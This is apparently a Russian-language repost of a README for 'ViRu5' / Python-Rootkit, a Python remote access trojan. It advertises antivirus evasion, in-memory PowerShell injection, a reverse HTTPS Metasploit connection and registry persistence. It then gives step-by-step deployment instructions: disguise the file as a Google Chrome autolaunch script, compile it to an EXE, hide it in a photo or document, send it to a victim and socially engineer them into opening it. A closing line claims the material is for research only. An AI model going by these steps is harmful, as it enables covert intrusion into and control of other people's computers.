Описание
Это полноценный необнаруживаемый RAT-код на Python, который может обойти почти все антивирусы и открыть бэкдор внутри любой машины Windows, которая установит обратное соединение https Metasploit с вашим компьютером для прослушивания.
Жизненный цикл ViRu5
- Обход всех антивирусов.
- Внесите в память вредоносный скрипт powershell.
- Установите обратное соединение https на атакующую машину.
- Проверяйте каждые 10 секунд и убедитесь, что соединение все еще существует, если оно не восстановит новое соединение.
- Добавьте ключ реестра запуска для повторного подключения к злоумышленнику после перезагрузки.
Шаги
- Обновите параметры viRu5 / source.py с помощью вашего lhost и lport
- Измените имя source.py на GoogleChromeAutoLaunch.py
- Добавьте GoogleChromeAutoLaunch.py, setup.py и ваш значок как icon.ico в c: \ python27 dir
- Из cmd выполните
- cd c: \ python27
# python setup.py py2exe
- Найдите файл EXE RAT в формате Dist.
- Скройте его влюбую фотографию, pdf, слово или любые файлы
- Отправить жертве
- Используйте свои навыки социального инженера, чтобы он открыл файл
- Вы получите обратное соединение https metasoplit ?
Протестировано на
- Windows 7 32bit
- Windows 7 64bit
- Windows 8 32bit
- Windows 8 64bit
- Windows 8.1 32bit
- Windows 8.1 64 bit
- Windows 10 32bit
- Windows 10 64bit
Скачать Python-Rootkit
¯\_(ツ)_/¯
Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.
